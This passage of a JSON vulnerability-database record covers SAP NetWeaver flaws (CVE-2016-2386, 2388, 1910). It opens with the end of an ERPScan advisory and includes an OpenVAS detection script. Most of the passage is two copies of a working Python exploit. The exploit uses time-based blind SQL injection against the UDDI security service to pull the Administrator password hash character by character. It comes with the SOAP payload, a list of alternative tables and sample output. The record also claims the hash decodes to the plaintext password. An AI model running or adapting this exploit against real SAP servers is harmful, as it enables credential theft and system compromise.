\nmobile/embedded to reverse engineering and ICS/SCADA systems, \naccumulating their experience to conduct the best SAP security \nresearch. \n \n \n \n11. 
ABOUT ERPScan \n \nERPScan is the most respected and credible Business Application \nSecurity provider. Founded in 2010, the company operates globally and \nenables large Oil and Gas, Financial and Retail organizations to \nsecure their mission-critical processes. Named as an \u2018Emerging Vendor\u2019 \nin Security by CRN, listed among \u201cTOP 100 SAP Solution providers\u201d and \ndistinguished by 30+ other awards, ERPScan is the leading SAP SE \npartner in discovering and resolving security vulnerabilities. ERPScan \nconsultants work with SAP SE in Walldorf to assist in improving the \nsecurity of their latest solutions. \n \nERPScan\u2019s primary mission is to close the gap between technical and \nbusiness security, and provide solutions to evaluate and secure SAP \nand Oracle ERP systems and business-critical applications from both, \ncyber-attacks as well as internal fraud. Usually our clients are large \nenterprises, Fortune 2000 companies and managed service providers \nwhose requirements are to actively monitor and manage security of vast \nSAP landscapes on a global scale. \n \nWe \u2018follow the sun\u2019 and function in two hubs, located in the Palo Alto \nand Amsterdam to provide threat intelligence services, agile support \nand operate local offices and partner network spanning 20+ countries \naround the globe. \n \n \n \nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301 \n \nPhone: 650.798.5255 \n \nTwitter: @erpscan \n \nScoop-it: Business Application Security \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/137129/ERPSCAN-16-011.txt"}, {"lastseen": "2018-01-12T08:25:29", "description": "", "published": "2018-01-12T00:00:00", "type": "packetstorm", "title": "SAP NetWeaver J2EE Engine 7.40 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386", "CVE-2016-2388", "CVE-2016-1910"], "modified": "2018-01-12T00:00:00", "id": "PACKETSTORM:145860", "href": "https://packetstormsecurity.com/files/145860/SAP-NetWeaver-J2EE-Engine-7.40-SQL-Injection.html", "sourceData": "`#!/usr/bin/env python \n# coding=utf-8 \n\"\"\" \nAuthor: Vahagn Vardanyan https://twitter.com/vah_13 \n \nBugs: \nCVE-2016-2386 SQL injection \nCVE-2016-2388 Information disclosure \nCVE-2016-1910 Crypto issue \n \n \n \nFollow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50 \n \nPOST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1 \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 \nSOAPAction: \nContent-Type: text/xml;charset=UTF-8 \nHost: nw74:50000 \nContent-Length: 500 \n \n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:sec=\"http://sap.com/esi/uddi/ejb/security/\"> \n<soapenv:Header/> \n<soapenv:Body> \n<sec:deletePermissionById> \n<permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId> \n</sec:deletePermissionById> \n</soapenv:Body> \n</soapenv:Envelope> \n \n \n \n \nIn SAP test server I have admin user who login is \"Administrator\" and so I used this payload \n \n%PRIVATE_DATASOURCE.un:Administrator% \n \nmost SAP's 
using j2ee_admin username for SAP administrator login \n \n%PRIVATE_DATASOURCE.un:j2ee_admin% \n \nYou can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure) \n \n1) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat# \n2) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages# \n \nInstead of J2EE_CONFIGENTRY table you can use this tables \n \nUME_STRINGS_PERM \nUME_STRINGS_ACTN \nBC_DDDBDP \nBC_COMPVERS \nTC_WDRR_MRO_LUT \nTC_WDRR_MRO_FILES \nT_CHUNK !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection \nT_DOMAIN \nT_SESSION \nUME_ACL_SUP_PERM \nUME_ACL_PERM \nUME_ACL_PERM_MEM \n \n \nAn example of a working exploit \n \nC:\\Python27\\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000 \nstart to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit \nthis may take a few minutes \nFound {SHA-512, 10000, 24}M \nFound {SHA-512, 10000, 24}MT \nFound {SHA-512, 10000, 24}MTI \nFound {SHA-512, 10000, 24}MTIz \nFound {SHA-512, 10000, 24}MTIzU \nFound {SHA-512, 10000, 24}MTIzUV \nFound {SHA-512, 10000, 24}MTIzUVd \nFound {SHA-512, 10000, 24}MTIzUVdF \nFound {SHA-512, 10000, 24}MTIzUVdFY \nFound {SHA-512, 10000, 24}MTIzUVdFYX \nFound {SHA-512, 10000, 24}MTIzUVdFYXN \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk8 \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88 \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88F \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6 \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X \n \n \nAnd finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text \n \nbase64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdA3AqA1AAoX \n \n\"\"\" 
\nimport argparse \nimport requests \nimport string \n \n_magic = \"{SHA-512, 10000, 24}\" \n_wrong_magic = \"{SHA-511, 10000, 24}\" \n_xml = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" \" \\ \n\"xmlns:sec=\\\"http://sap.com/esi/uddi/ejb/security/\\\">\\r\\n <soapenv:Header/>\\r\\n <soapenv:Body>\\r\\n \" \\ \n\"<sec:deletePermissionById>\\r\\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, \" \\ \n\"UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{\" \\ \n\"0}%') AND '1'='1</permissionId>\\r\\n </sec:deletePermissionById>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope> \" \nhost = \"\" \nport = 0 \n_dictionary = string.digits + string.uppercase + string.lowercase \n \ndef _get_timeout(_data): \nreturn requests.post(\"http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean\".format(host, port), \nheaders={ \n\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 \" \n\"Firefox/57.0\", \n\"SOAPAction\": \"\", \n\"Content-Type\": \"text/xml;charset=UTF-8\" \n}, \ndata=_xml.format(_data)).elapsed.total_seconds() \n \n \nif __name__ == \"__main__\": \nparser = argparse.ArgumentParser() \nparser.add_argument('--host') \nparser.add_argument('--port') \nparser.add_argument('-v') \n \nargs = parser.parse_args() \nargs_dict = vars(args) \n \nhost = args_dict['host'] \nport = args_dict['port'] \n \nprint \"start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit \".format(host) \n_hash = _magic \nprint \"this may take a few minutes\" \nfor i in range(24): # you can change it if like to get full hash \nfor _char in _dictionary: \nif not (args_dict['v'] is None): \nprint \"checking {0}\".format(_hash + _char) \nif _get_timeout(_hash + _char) > 1.300: # timeout for local SAP server \n_hash += _char \nprint \"Found \" + _hash \nbreak \n \n \n`\n", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/145860/sapnetweaverj2eeengine740-sql.txt"}], "openvas": [{"lastseen": "2020-05-12T17:21:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2386", "CVE-2016-2388"], "description": "SAP NetWeaver is prone to multiple vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2016-05-23T00:00:00", "id": "OPENVAS:1361412562310106083", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106083", "type": "openvas", "title": "SAP NetWeaver Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SAP NetWeaver Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:sap:netweaver';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106083\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-23 10:42:10 +0700 (Mon, 23 May 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2016-2386\", \"CVE-2016-2388\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"SAP NetWeaver Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_sap_netweaver_detect.nasl\");\n script_mandatory_keys(\"sap_netweaver/installed\");\n\n script_tag(name:\"summary\", value:\"SAP NetWeaver is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP GET request and checks the response.\");\n\n script_tag(name:\"insight\", value:\"SQL injection vulnerability in the UDDI server (CVE-2016-2386).\n The Universal Worklist Configuration in SAP NetWeaver 7.4 allows remote attackers to obtain sensitive\n user information via a crafted HTTP request (CVE-2016-2388).\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may execute arbitrary SQL commands or obtain\n sensitive user information via a crafted HTTP request.\");\n\n script_tag(name:\"affected\", 
value:\"Version 7.1 until 7.5\");\n\n script_tag(name:\"solution\", value:\"Check the references for solutions.\");\n\n script_xref(name:\"URL\", value:\"https://service.sap.com/sap/support/notes/2101079\");\n script_xref(name:\"URL\", value:\"https://service.sap.com/sap/support/notes/2256846\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/43495/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nurl = '/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat';\n\n# NetWeaver seems sometimes to check the 'User-Agent'\nreq = http_get_req(port: port, url: url, user_agent: 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.19) Gecko/20110420 Firefox/3.5.19');\nres = http_keepalive_send_recv(port: port, data: req);\n\nif (\"Add Participant\" >< res && \"<title>Instant Messaging</title>\" >< res) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:46", "description": "\nSAP NetWeaver J2EE Engine 7.40 - SQL Injection", "edition": 1, "published": "2018-01-10T00:00:00", "title": "SAP NetWeaver J2EE Engine 7.40 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386", "CVE-2016-2388", "CVE-2016-1910"], "modified": "2018-01-10T00:00:00", "id": "EXPLOITPACK:65C2E64117E8F5912C9ABA1DC61429AE", "href": "", "sourceData": "#!/usr/bin/env python\n# coding=utf-8\n\"\"\"\nAuthor: Vahagn Vardanyan https://twitter.com/vah_13\n\nBugs:\nCVE-2016-2386 SQL injection\nCVE-2016-2388 Information disclosure\nCVE-2016-1910 Crypto issue\n\n\n\nFollow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50\n \n 
POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1\n\tUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\n\tSOAPAction:\n\tContent-Type: text/xml;charset=UTF-8\n\tHost: nw74:50000\n\tContent-Length: 500\n\n\t<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:sec=\"http://sap.com/esi/uddi/ejb/security/\">\n\t <soapenv:Header/>\n\t <soapenv:Body>\n\t\t<sec:deletePermissionById>\n\t\t <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>\n\t\t</sec:deletePermissionById>\n\t </soapenv:Body>\n\t</soapenv:Envelope>\n \n\n\n\nIn SAP test server I have admin user who login is \"Administrator\" and so I used this payload\n\n %PRIVATE_DATASOURCE.un:Administrator%\n\nmost SAP's using j2ee_admin username for SAP administrator login\n\n %PRIVATE_DATASOURCE.un:j2ee_admin%\n\nYou can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure)\n\n\t1)\thttp:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#\n\t2)\thttp:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#\n\nInstead of J2EE_CONFIGENTRY table you can use this tables\n\n UME_STRINGS_PERM\n UME_STRINGS_ACTN\n BC_DDDBDP\n BC_COMPVERS\n TC_WDRR_MRO_LUT\n TC_WDRR_MRO_FILES\n T_CHUNK !!! 
very big table, if SAP server will not response during 20 seconds then you have SQL injection\n T_DOMAIN\n T_SESSION\n UME_ACL_SUP_PERM\n UME_ACL_PERM\n UME_ACL_PERM_MEM\n\n\nAn example of a working exploit\n\n\tC:\\Python27\\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000\n\tstart to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit\n\tthis may take a few minutes\n\tFound {SHA-512, 10000, 24}M\n\tFound {SHA-512, 10000, 24}MT\n\tFound {SHA-512, 10000, 24}MTI\n\tFound {SHA-512, 10000, 24}MTIz\n\tFound {SHA-512, 10000, 24}MTIzU\n\tFound {SHA-512, 10000, 24}MTIzUV\n\tFound {SHA-512, 10000, 24}MTIzUVd\n\tFound {SHA-512, 10000, 24}MTIzUVdF\n\tFound {SHA-512, 10000, 24}MTIzUVdFY\n\tFound {SHA-512, 10000, 24}MTIzUVdFYX\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXN\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk8\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88F\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X\n\n\nAnd finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text\n\n\tbase64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasd\u00f3\u00c1q\u00b9\u0080\u00baX\n\n\"\"\"\nimport argparse\nimport requests\nimport string\n\n_magic = \"{SHA-512, 10000, 24}\"\n_wrong_magic = \"{SHA-511, 10000, 24}\"\n_xml = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" \" \\\n \"xmlns:sec=\\\"http://sap.com/esi/uddi/ejb/security/\\\">\\r\\n <soapenv:Header/>\\r\\n <soapenv:Body>\\r\\n \" \\\n \"<sec:deletePermissionById>\\r\\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, \" \\\n \"UME_STRINGS where UME_STRINGS.PID like 
'%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{\" \\\n \"0}%') AND '1'='1</permissionId>\\r\\n </sec:deletePermissionById>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope> \"\nhost = \"\"\nport = 0\n_dictionary = string.digits + string.uppercase + string.lowercase\n\ndef _get_timeout(_data):\n return requests.post(\"http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean\".format(host, port),\n headers={\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 \"\n \"Firefox/57.0\",\n \"SOAPAction\": \"\",\n \"Content-Type\": \"text/xml;charset=UTF-8\"\n },\n data=_xml.format(_data)).elapsed.total_seconds()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--host')\n parser.add_argument('--port')\n parser.add_argument('-v')\n\n args = parser.parse_args()\n args_dict = vars(args)\n\n host = args_dict['host']\n port = args_dict['port']\n\n print \"start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit \".format(host)\n _hash = _magic\n print \"this may take a few minutes\"\n for i in range(24): # you can change it if like to get full hash\n for _char in _dictionary:\n if not (args_dict['v'] is None):\n print \"checking {0}\".format(_hash + _char)\n if _get_timeout(_hash + _char) > 1.300: # timeout for local SAP server\n _hash += _char\n print \"Found \" + _hash\n break", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}